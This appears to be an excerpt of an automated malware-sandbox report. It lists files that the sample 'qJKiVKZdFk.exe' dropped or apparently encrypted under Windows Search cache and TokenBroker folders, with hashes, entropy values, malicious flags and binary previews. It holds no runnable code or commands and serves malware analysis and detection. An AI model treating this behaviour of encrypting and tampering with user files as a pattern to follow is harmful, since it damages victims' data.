                                                                                                                                      Preview:/*!Di....fOu............U.t.R._......z)..........6.h.=tE..iH."V..#.'g..\?F]......w...w....Y..Q...4.:k(u!........+. \...8y.VPA....f..........4.Cb..S...`4....ehP.<..~....^...P...+....\.<.....".u.hDn."..j..E...D.r.....IIbM..,...L....+......Q.._.h]{...r..^..%..M....J.?.6.NRZg..e..v"m.`..$.'V..<.M.....?\w..s.0.R..Z7.vw...x..E...+\U.,.n.(...p.....4.!.....C|..o.......... .a..kf......o.6.K.........c<.x.#.....<...:..C.......OM..!'...0]....b.N...x...x3...u-...h...u....3..N&K....?.U...8.I.......*.r.,VY...r.]......12..F..t.....NC.vP...3p.>...e....%.+{......D.^.f..Mk:.+.....5kx.,.0>....e.6Nc$...Vy.K..th...V.q"]*n.-.-$..6.(....\\..kb0.....d....[K..fW.$XEG.|F{.....j.%`....49...C...F..x8#........z...[[..@..H.5+&.fwQ.3.R.S...x.......7J.A...m.W.~]..C"../.....C..(f...4...U.J.{........eL..;u........v1o...............<..wqm.F.....$...^......Y5.1..\}.H-6...U..8.....Q.........;..Wv.?G.....A.Y~".V.\.Y..%}..H...P.B5.4.G.Yp....*_..6......,.1...w...[.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\th[1].svg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28813
                                                                                                                                      Entropy (8bit):7.994248523998686
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:uLY71wYjoZ75y7MqovdMiDuFvElxJChoA0t1ju7wDT:6S/oGydWylxJ/A0tBrH
                                                                                                                                      MD5:23567B51224627196ED137D26077FE3F
                                                                                                                                      SHA1:5ACE617A02326BA1DA3EF6A64B94E7E24592D1CC
                                                                                                                                      SHA-256:BA901B9ADBD289390E08D2910962A58EA83AE6B05781D4FAB85838ED6B23C2AF
                                                                                                                                      SHA-512:9965DDE7487AB7C12862665DB636D2A6B72628CC0BAC1040F129C7A2250E51698485A3693D90F2AAA2E41437A4AE9DC1D81B786B9296D96E1F16493567D1170B
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<svg f.w ........K+.mWI.DB.<.=......1RD.$.-..b!.c........,.%.yq.6.2.F..~..*#..d....![Lt3$....r!.'p....>B.\\.....7...&.%.....a.$..]................m.$.&.~.s.w....q....s>T{....D.......=.....]...C.....}...yub <..C~E..:....=.2Y'/..........\zX.V...7xY.0.. .T.........p. s.z&..9m.<.+H...}8Y.....#$7...?G@X2...O.....Ea$n...y.;....o....QgZ._.+C>..Z.....b...}Gx......s....(.z.......h..2N..[@..=.b...B.k|-,..Z|K...l..O(.......)Im...P4.L.i:.]wW..~...~....S.sW..'..?a.....-.*....^x..M...B.}nB.....P...$p..FV.....v.-....2..{d(..........,...T3Q,..&<...?.v.9Q....cG..S.`7[.k.51F.5q..z.N._.}..+.]...O. [eQ(..6..v.J......G...C....z".T.v..)....Uh]...8..pY..........*..PkKi.{.U[...M.W1..3P...K.[+D@..D........[.;...K..Z....\..].k.t.@..*=(.....:._;.2,.<v%X.y>{E.pK...@.l?!...V.....`2.....Q..<..3zT..Ra....t..g.I&.@u...M.jiQm..`E.gg.."^...i..O...x.`..%.6..............).*V.F.n..x....'....../f..<.n...x.......r...k&..Q...O..."M...-.L.=?.....|.?9...Pkp..7...x2.....d1.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\th[2].png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):21870
                                                                                                                                      Entropy (8bit):7.992174107282999
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:J8Vx0cc5Vk3L/diGNNiMS7QDmr6UiV61rHUuRH9ZX8t32h/1Xo+13uL5CoP:J8/0ccc/hNiID+oVfud03a1Xo+13uL5F
                                                                                                                                      MD5:5407BE1697E3258994044E91A135FABF
                                                                                                                                      SHA1:4F2707ADB4369A54B20CD80049377F2AAD637A6B
                                                                                                                                      SHA-256:053F01A8E6F7684855B7AF253B1ED15AACE1D31551A3650B578F073ADFCE0F1D
                                                                                                                                      SHA-512:262A2C8700EC0561455E93AF552CDE0551515EACEB28BD1D1041E9B005C965A2B0092E650947A0C3FEC07DA6CE6D794AA715D1E86CC7326894B9CC8142DE2F21
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.PNG.|..`"u....~.../...y.f.U8.......Y.3....dD{EFf||0.o[C..=r.R..9.B....!....Rz.t....$.S.b....W..Z...mV.....V@.%.y.=.0.T1.s.......j.....$...n.<.F7'....:...1G...qHj.I..h#....b"...'....U+...(...K......lv=VuL.E...hX9....W....g..oQV..A.:.{.q.B..`..)......(E.%.AnT.."....*../.@V...<y.2..Ey..&...7.An}\....P...Y.....>.x..6...#.........W..t.WoqQP.......a...._.n..L?@\.f.N.f..e.....*s....TI.y.........f.PO].h&{l.IY....].|{.f..:...d`.\.'C..^...BM..c....:.t.x3..8ua.."D..s...hZ...>C......1....d^...~.g+'CK.......'.R.o......W.......1..%.K$.H...B...7..=Ys...G.K:.D.f..2.t].8.=....jv.-.. 0...(S...b....d..@X.{................._j..e.4........$+...A..~/....V..d..o.!.<....*...d.Xk)Ii...-...S....j...x........F...o......*....y.......,F.q.~.P...Qn..5.7\~/. ..B.].K.B$N9.C7]E<....,.h.+...........2.).M..q..ED..V..x.CJjs....g.M.VD..p...!|...d...........F..KA..k.u...g..M4...L.....9.9W.&..._.s@.h].3V}..!. ....S.{.......7.......M.?d.)(..Ht..b/.)H..fh.1."...7

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\trans[1].gif

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:GIF image data 4727
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):377
                                                                                                                                      Entropy (8bit):7.221736042666635
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:ZYqSyFcMqGRTSekY1jjJz4NRopyZv1LJbQ39L+G/PD+b0tc++4sD+mxpZN3ukIcq:ZE6eekY3JgRopAv1LFQ3p+8+b0A4szRe
                                                                                                                                      MD5:1B163299341DA621E48AF061861E74F6
                                                                                                                                      SHA1:71BDE03DD325D55662C9531DE3710356E23D4B67
                                                                                                                                      SHA-256:912025CFBED16A8AD605BF6A39E7D126EC2A0F60D297B4271EE33422E0B03409
                                                                                                                                      SHA-512:509C4EAE8D33BAAD2035BA54EF81D87095794C5119E3C8A1053965164CA6679C2C8A1F35FDF1CEB4CD6A4999F986BE762BFBD4B1374FF7992177B00A28065677
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GIF89.j.w..[.2.Q....a.S..i.lp.!.Ij.O...9.....|..;$...i...z._x#.w....A<....\........zy;ty..U....6Kt..?Rm.". .c.)Q.....q.<y.x.V..6.e....} IC..2..pJ.p..z.e...i.n....iD.+.D.I......i.;.H.k.4$.;~.cqi."l5.2(Qq8l$qX..Dep.:...{...b....cm.l...2hSw3.....E(...."..V.f..f7,.o.oA..:.......p.lRa.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\UTD5SFEV\trans[2].gif

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:GIF image data 26253 x 1189
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):377
                                                                                                                                      Entropy (8bit):7.379886994769505
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:ZTOhb6vlPddU5Pv6ffHyRfAFJUeP8zvcs/Dhyxh4TNFSASfWKKqkb0v1iPX+RlMR:ZTeElld2vS6RfAFrP+/FyxhGSFWNUY+c
                                                                                                                                      MD5:6C5AF053AA1B7444837C10207C57F4C7
                                                                                                                                      SHA1:C31B4200D7B61AD7BB9B37F4028C21C62DE13690
                                                                                                                                      SHA-256:89457217256BFDB2336BFCA9A9A73BAE51FBBB9922F65AE544ADC586F91DBC06
                                                                                                                                      SHA-512:40A9D19C7361AAF44B51B9FB8EDB00B493E42FD8492B70BC02A7D06DEC07B06ABCA9F0A14191DDF7B96D8BAE6568914F139D7DB78D2329B0F5CF24C12CABA331
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GIF89..f.... G.K...k...5~......0..V..7...^...Yw.*X.).-...$..3.;......%..t'.JCV._.x.*MF.......u...5^k...S...GT^.#=X...H.wx......j.}..TG....0...r.r.......k.."...Q..............&..#&A...S.&H..L..#...EJB.g..h......".m;.+...v,....]:sy^......l...3-......2..'.l-j6..".Zy..o!....%..ntp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58154
                                                                                                                                      Entropy (8bit):7.996784398815962
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:8HwUV2Zgej7w6waT3Le+t3AMBJDCkCipC:8HjV2m6wee+tj+TiC
                                                                                                                                      MD5:753C0D656FE9E14186F555D6E4D3262F
                                                                                                                                      SHA1:142BDD953123F51A8138C8F355554D4753E2FA2E
                                                                                                                                      SHA-256:4E7E1299B0031930C9AE05165FAD4FF067D6E9AA1EB455663381A925F1466AB8
                                                                                                                                      SHA-512:D4B723B836B82A14660E241A26C97A82881EAD49A9EA9982F05C4CD07BF497C15D3526625906DB5A7F76EC16EF581EA5664FC26B4CA0AE4E12DC1DA4799F26F4
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:var _.(..Ij..9d%......g.....-[qL!..A.k.`..u=.<..b#.b..c.1........:[...,-......Oc..wvq.N..M.J).e..l..K....&-.2.....dV_.V.7...'..I\ ....5...Tz...y...u5.a.9.+.q.....R}..aK...v...(.!........X...j....;.?......].y...).aI.be...+..x...!.F..p.../I1...%..eUU.q.\....b].r....5.Gq:U.....w..m.......B.x....q.....ikM.;.Z.0.3.....)-2.W....!..<.yaz........^.U..GgW,...VI..IK..0:....4...u...i.............z...|../.XEPj$.(.<*..R[2.s.hXJ.F...mj....I(.r..JJ....(X....p........D...W..iS....c..DH.|...`.|.u...4.L..pw.....>K...u`..a.DA.=....O...3....G..,"..r=........q..F.@S.......-.s.j..2.8.^.J..s"..].9..2..._.*..w...K...}..`,|..P(.....\....^..Q.......T.A.7g...Z.)7<]-s..xn.j..l..&.;.$.....M.<-..#.D....E..)...7.,.rQN.....'...e..5s..&.K2w,.3;...8.....].....5.SH.H..\.k..@.H.....-.j.........%..&...'V.q.....i.Y.c-X m*....;ve. .......u......S6B.<......^r..!7nK...lB.C....W.z..H..K....0=..v.^..O.M.t8.-....D.F..g...iH.L.k..C1>.Y.......\Q4....l..y.....}V...(...l.`..O....e

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\th[1].png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18845
                                                                                                                                      Entropy (8bit):7.990443374083859
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:XzOh658RBk6pyapoe1ck4K8A83z+fxXDo9mvNdg8/wEYX/cbx:qh658oCyaGKcTK88JDoMNd0X0x
                                                                                                                                      MD5:EB75375F1F079F8D6B239C802E6584C7
                                                                                                                                      SHA1:5242B13C9F91F866F368C803E856F1F857DCE6A0
                                                                                                                                      SHA-256:667C6FB0A6F8DB9E2EBDCFA2F47F5F7371C6681C2DD610CF50459CE405BFF507
                                                                                                                                      SHA-512:6C6C560392D29EE04A72BB46B56F12F93DAC01A4F90F6238E12D4DF859FDF11EE9C913E3AAD02107F08EC802536FA02F68D2D0478CCA8AD1C65FD23290E34493
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.PNG...-.....F!..t.k..qzr.....l..._..c0Z..=..P.]u..H.I..1.n...Re..j.On..6A[.........3......l..m..Y...A.).t.....,.6o.).......S..<W.."+.E.o.4._..;.#.e....V....\`P..d>^.N..$}...y.C...RM...?aQ.TJ......K'..i.......s..Eg....].1$..B.\...F..TB%njK/..7.i...W...l4PhpV.....F.,4t+o....;A..,.=...G...*..!..\.m.@.)7E. h%2f.v.Q...JP.X$...C|...~..4#?.....i..M.=+.*.M~o....(l....wC.v1z.s....Y..<@W5..<.........A.0.R..Hh..]3.?es..M...5P\][..%.Y.a....k....E....;...~+..$.....Y/.G...4..j....+._.Q..#.$.J=....|..'fP+.r...e.>.* .pS....k...2.]...}._..eh......F.........c._?..w..I.N..sw...>..Z.u.....y...O..dY.2....p4..{H`..[..C..>.......{9...]Z?."+k.Y.9...!.a..W...$..pSt......Y.......7..>/.A)O."...~.o.K.g.D......4..a..#=z.j.$..T..rK...Cs./..*s.E....v........0...d!Tc...K....+..h7M.5"..G...$._m..ZJXa..=P.sS..6..R.N7 .R.g6}.T.....$..$z...Z.y........EA..yXZ.(@}...y%.g.I.~.!.H2]......Sm"7....p....!,Y.y.>.$..=Fy"..GN.....y..9......?w;n....M...Vl)..d.f..*...Z...H.x..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\th[1].svg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1988
                                                                                                                                      Entropy (8bit):7.90642789769083
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ykw0D+5VzHFbOEN8otsy5pDV2wAu7TOIkZMSD:lKXZijspRhkb
                                                                                                                                      MD5:98CBC9D6137437EB9FC67187ECF40E3D
                                                                                                                                      SHA1:0FA90DE88DA19A1C44CC53F71681E832797364D4
                                                                                                                                      SHA-256:6E56B16ED7409B8722149C9B1F878D98A061203A888F0AFFC664EBF2E34C713D
                                                                                                                                      SHA-512:97F732A6A632985314A2613FAD4D967D9461B0EA0733E42F8E6407ADB9E070C8ED2EBFD03A397AF0C781B98DD43D03091F00F42BBE30133ED34AA06C2FE1A065
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg ...UvG.-`%......?..l...1.X..X...Yl.|....Bd......j...=.}2...$.q..............P'.[.twM.F...vj(..Ij........~-..............$....C.?8..Z...............Q..#4.}.d3.=....(.X'........u...}.pKM.x.m.m..J..~@FZ.u5.d.....^.-...{k....._..,.Dg.d...V6.!.|.7=C.8.c)........@..#.I.........?..........T.d.A..d`d.........aK>.^E....sR..J+..k&.>.....>..2......x......./u.....-...a$...Y .......s...4k..O..`..=....z....E.:...[$.].........'.dvp.5..a...Jj..~.<QI.S}.P... .......@...Z.!z...{L.......<..~a/I.q..L.....*Rm...D>...B$....q?CJ.UQ...,e...a. ......j.y%l8........w....W.uv.......^......X>.k......V..!/..F..,.v.c.~..r.c.....T...;.F......B.m.c..:}...O&<.j.I....e..I._.....he>.:-.Rw.@.j.P.P.-...#.W...p,A...K..k:....y.l^R.....iJX..r.ome.)E...LE../...k.c}...(.*42..s....3se_..|..%.L,..HE.j.wh.....K.H..t....,<J.7S..'l...Y.0..z]....CV................M.{`l.x.1. 7.1. k.N.u;0....G.t.q..$......#S......}>.Ieh.<y........7>.W....w..>..\.,,d..(.?6....j.X...(.5......*.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\th[2].png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14817
                                                                                                                                      Entropy (8bit):7.986886033743175
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:kAfk0Gm588NjKKE0Xo/mTn5DBOrLAl04SpLAu6l:bFGmfjKKEmBDErN48Ql
                                                                                                                                      MD5:9D615C3AFCC727BC05B8C4516C798F08
                                                                                                                                      SHA1:D46DD2D9DD3C2BB4C4BDAA63281AE24084526E12
                                                                                                                                      SHA-256:63E96E7ADBDD2CA4824FD8F9988B79C2C5047D0A2CC04F39C0570919190D77C8
                                                                                                                                      SHA-512:99DBFDDC06ED54EC3AFF8A86527C0F483CD5D5BA7B2435028F75FA6F3C4F9FE47D93F4D4DD3DD80B1CE25B07EABC5D901EE607F5A0795EA53AD5EC86D771FFC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG.(........>......-..V@-..u.N..R.....p....s.D1*.A./.D..c....p..JU|.]0V...16....z./.?.3.....d.x....P..R......x..y...\.w\......?9..<..1..S..~`.`..........f....+..3)*..f%..3-g4...#.5.....Hc+.O..........T....{qh.'.}..~...........r..z....q.Qq......+...Kr.?0L[2....'.W..c. j!qd.|.%..........|...u..)S..N.g>.}i..(`....~...)>.x.N........T...4o;Y`..a3A..3 ..Ir...3...:.....-.#.t.y#z......$$..xS.3.9rN.`QE...D~F...r....._i.I.^./]`..=..F.....GU.tr...O.....n.X..f...."Jh...Av....)g).`..........xt0..w...e.J..?C.e... sD..33....qVT....kh..:...?m..=O.......#G.-=..PN".i|.2...|e"5..G....P@.!..x. S.o@...c..Q.;..3C..x$.d..-.l..J.f.....:v...st73...j....y.6.[..y..].!x.Q.."....AM... ..&.PJO....N...w....&O.::6F....AY.E[jR.72.n.PJK...5oF....?Mms.`..(S.:.$..Y>O...0&j...Ne."x...."E..:.....^8.....3..7K.PG...I[...b......5..qX.T...6.;.7...$q..F.!..XC..%.x..c....g.....d._....:QW"v..5.DZ.t/...{h[.)A.4q.qR.i^...&.>"..9.3.c..0..X.a......&h7m...E^}.;..7N[.. ....LHe.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\trans[1].gif

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:GIF image data 32284 x
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):377
                                                                                                                                      Entropy (8bit):7.3199050901220595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:d0n/eFgyYZo2umkfK1PnMg34MUJ6mj94cuqtU3WIPdkzr2jc3F4jq9YETJWP3uk6:s/eiomRl13O0mj95GWsdqrEMF4W9YSEG
                                                                                                                                      MD5:0160FC7B7C264989567B170CDA61894A
                                                                                                                                      SHA1:A6AB828B91E28AF1DC362D89E1F1F323F9EEC4BD
                                                                                                                                      SHA-256:9A1CDE2B41BAED01912CFC09DE0EDD6F5997F6D0F54177AA201630A624224FC4
                                                                                                                                      SHA-512:2D438AA91EA62311C2645C371B8776E56163C38691AF0AB1BFD38024B0EFB7CD5CFEDE24124A431FD41B8F65CF7F7D84DC92FA2328FD65B70A4019B2EB088DB5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GIF89..~...#.D.s..m..!..k?O`;....M.2...q......NbLO...jg.\..6o".....F.N....S..zZ.f[<J.....zq.........z#......Z......jAJ..7..n.$..O.n......al......,.5.RmX'b...;..t.C....J......o9...I.#..;q.0..b.4N....C{\z......Q>.Y[....:fN...f.-......U......n. .........,.j...)..M6.@..V..V.xb...b.S?."tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\XP05FTX1\trans[2].gif

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:GIF image data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):377
                                                                                                                                      Entropy (8bit):7.405871352717275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:gT9jwuGRNNVu377dGFVkFn6uXC/xC1O2XXfwvy9tv+zx2DlYW33ukIcii96Z:WBkRNC377Gmn6Vz2XvGivyg5VukIciik
                                                                                                                                      MD5:517610A7570E5C8A9390DDC5EC888405
                                                                                                                                      SHA1:A392C780DB5CD406D90F4C2149A775927DC79EB8
                                                                                                                                      SHA-256:CF087DCAD923C471F81DE0F4472EF7ED514973DF0F3945BBED0F248487567870
                                                                                                                                      SHA-512:88BA7AC664E7633581FA38C9D076D111CA941559D5EB9921FF8E1D079CB826CE8FBC856A62064F66FF417913392D0EEC8BD6468B33732EE82D3725235B77AC32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GIF89?=....U:.C..a.+..=..?...Z%......n=..............Z.D......2..rN...tu.........4xlY......`.....:.<~`.3...v.K...~..U......4I}..C.............:EE.....+.|\.m..b6.Us..,...+....gqS.G.q.H.k@..~..{;T........@*v.G.\..T.......jS...Vt..L.....).-..E-.t!.i'.A..XH[5...Y.u'.3.t...@..)..jV.!..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3018
                                                                                                                                      Entropy (8bit):7.941627295932426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Cfa8QuaFjw2ajkerN4adEei8lHH9D9BcIvyLvkBwCsn1DiKGuN8x4X2cWKtqCD:CfaFe2remadEeioHHVc14dsn1jZN8uXn
                                                                                                                                      MD5:9EA35D759F9A90D86E016C7804B3B828
                                                                                                                                      SHA1:AFD80E883B61C7813DB71789E489927CDF3CF081
                                                                                                                                      SHA-256:20FC13E5EBC4D1E60B2C1694421114C5C07653BF67D1FE196DF30F5BCCF6F4C2
                                                                                                                                      SHA-512:D87B674ADD0512F20254D7DFBF4B7329BF19F265262930CFD294E28BADC6B3ECE20D60D8D297C98AC43E2FBC1312183681AA6E12338B3398CE2263F135E72442
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TT.l..X....r..&_$..:.....y._..........S. ...=6...*j{.z.UJ!Q|c.j.N*{-b.:....Af.2..Ir..z.........d..."..b..0......+.2.:.........|........-...'H0..@.?..q....W.$3.a......n...Y6.&C..%..>)..E.P...z.....*..T...~.................*.D".".......X.}.}.kj..|=..!....../.B...$.6.\.t.s{...PD.E..!./ZLz..!.."b..}.....(...`C.^...h......,..!6...L..<...y[}+._{,N....-.....8#..M....'j..1.(+.9.!..U..$.(.9`..d..k.hqbk.\7v.ua.+FN..*...M.......n.V.a...R@.h"w...d..C..G.A.[..@n..Il..\.&5d..B.)qn.........e.)..^.......O\.E..o........52...aB.<...(..S..Re-.M7.|_.c....}._.(...'.......E..0,..G.j}..a,$.8...NU\<N....G#../...x./....>.>k.A,.r..".d.Q.5.eu..G.?Z*...C..j.l..B..X...P.`L>.+X.;.V.X......lG~.z`..[N.].........8..e.[........^&..D.I8d.L\r.C.......a..P3....r...k..w..'......w?P...=J.l$>....J2.I... ]3..d..O...>.}VA..Y...S....<.6.]r^9D70yd^n.......^pv.1.6>....E...'..n|......C...WX.@..MtD*.."..Qh,eJ,....m....(5%..l.\:...&.|?.....$..RD.rIu.....p..:..m...v..G.:u._..r~..m

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.917192657142821
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:W9wpAJMaNcKM1nKolijonuBPS5O3PpQy7/4DBRF9tIYCwZ24JD:YiKM1ndo2udS5sPHwDBR5IYCwEc
                                                                                                                                      MD5:CD59E5102C39607F2865AB814E00BD4C
                                                                                                                                      SHA1:6AD0AB45F131F89CE036D899144599B2924D174B
                                                                                                                                      SHA-256:C05B7D1774FF951A1C882CAC5F4A88E55C5398E3D23B5A669504E8D56B492165
                                                                                                                                      SHA-512:518197AF8C262A3E907D606D719F5A8D83346D0A4AEF4FD588A27339149413B9BF9BCE9CFA1413A11CDF1D95A219A0DE6A4DDC060D24078C94EF57DFBABEE6DE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T.m.i...Y4.....".D..j.n......{t.<..x'..HL+p..<.3..g....$.. ...H'.....=m.?v7a.....Q....%..,pY..../]yQ ..u^.`.XO...$..J.q.+?..(y.....(.\..uRGb.k5.g+.,......t$.s....h.6..r.....;OW..&..E..]1s#..tz.C..*&.w..V.....]..oN..t.;Q......r{.<ge(.Z..0...._...lF\3hEt>.:8.v.z{..X.Nw.....S..{^xP....t.\..Vh6'<....kn.......@A....v..w..y...e3H....~q.7.x.bP.s.0.-...&H+.*...z.{..w..:%....Q.....+.c.Q.9...7YAXo.........\......| .. ..g.1....b..t.t.H..\....%]~....h.d...........U1=...>mxWM....2.1.6-.T.n..w.6..6:...R...%@.....zVSk..q....*.u3.9.#.k...Q...0[...-!..M.H..3..1.8i.32..7.s/.......?.M.xD..j.Po.~*-I.....ev.t...........v9..f.F..>e.67.w[3....p.....+..;~.'*.a..7.X..;.P3..pm.H......O&......./.0.l....@n....j.q@ b....H_..xS..Ug..V$.....J..::.HP)..c.....,LYie...{.R......L`.].o..CJ..tdY........no.....1F......w...-hL.0%)A...0....a/~..3{.%..'....2.T.Qv.HY.b.).e.1........Z..<./.9.-S.jE....q*..6..?QJ.L2.Q....+.&G.....y..r........o.`.].V.w.V..+...._.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{05ea5f90-4347-4a95-a7e3-40799835a752}\0.0.filtertrie.intermediate.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37812
                                                                                                                                      Entropy (8bit):7.996083714010878
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:TVnqVjdwoyQO8CaBs6Tte4jMHIqZuEoCsFqJ8/ZWFxFfIvsKvh:xkVXTtWHI1Qs4J8/cF0h
                                                                                                                                      MD5:ED0EC71B2D1716E36757D59A4AF1808C
                                                                                                                                      SHA1:0F69667C9F9DC08F18E7E623D4D197588BD2E7EE
                                                                                                                                      SHA-256:820F9A58F42EEAB440F3975425AFAB9C7E3D1D470F4F93A3B6ED423E8AC4934E
                                                                                                                                      SHA-512:7C2F9B65BC3C350D1B6B464F59748476209D6E3F58067E94B87D2EDFFB8C9C29CB5423F8DB4AF7299AD7C85B3675EC1DFD0CCA4251D42EF1D6B74BFD5BDA1C90
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:0.0..3.l......b....U_....~.}6Po.....K.........{.P....D...x.TA.....2.../I.7..........~.C./9..QhpB2N".,.....wz0R...>."...5?.Z;f......8.{6h..k......S......(_.m<..M.*h.(....cK.\.*(.!.].3...t.....).C....{A.R.uL.....b..0..H...Pj...WIl3.=..~..b:A.!u..C`6t..tF.... ,....6.I...o....d.G..D4.H.....j.Y......S.......%..=7]......._.3 ^..).~..w....2a.Y.'..I..Q.L.m..t..w......i.".I........P.r.MuY..RUg.....d($.oMB...s..X.k.7.[.q.:....A.C]3~..)}k..w..."....k..v...^..F..$J..+.....:f.l3%..yQgD..M..X,......m.@{.9G..)SS.(.lw........|.....#...b.R.o.....al.. ...9#I*..\56......{w....I..a....xa..'o.6K...}Yl6<..M0h.k.9.-....WAO..v!........n6..=0.+......S......;..._/....sK..j...*.11...CW.4.w.3....'.#...Sfc_".U!Md..iNS.Q.m'`.>...f..4..I..x....."......J.....m./....f.i....).Y=D...u.1..3Y...v..d....e_b..n.9.>%..h...fB0x..w.G.\Z....4..s...).$~b.x|..........xzws........w.^/.'......K......_.<@s.vyGG.z.g.n..p..z.Vvo8....7...d-..W$SK..o0p&C3..4....m.#...v^p.?.E9...q...q..........

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{05ea5f90-4347-4a95-a7e3-40799835a752}\Apps.ft

                                                                                                                                      Download File
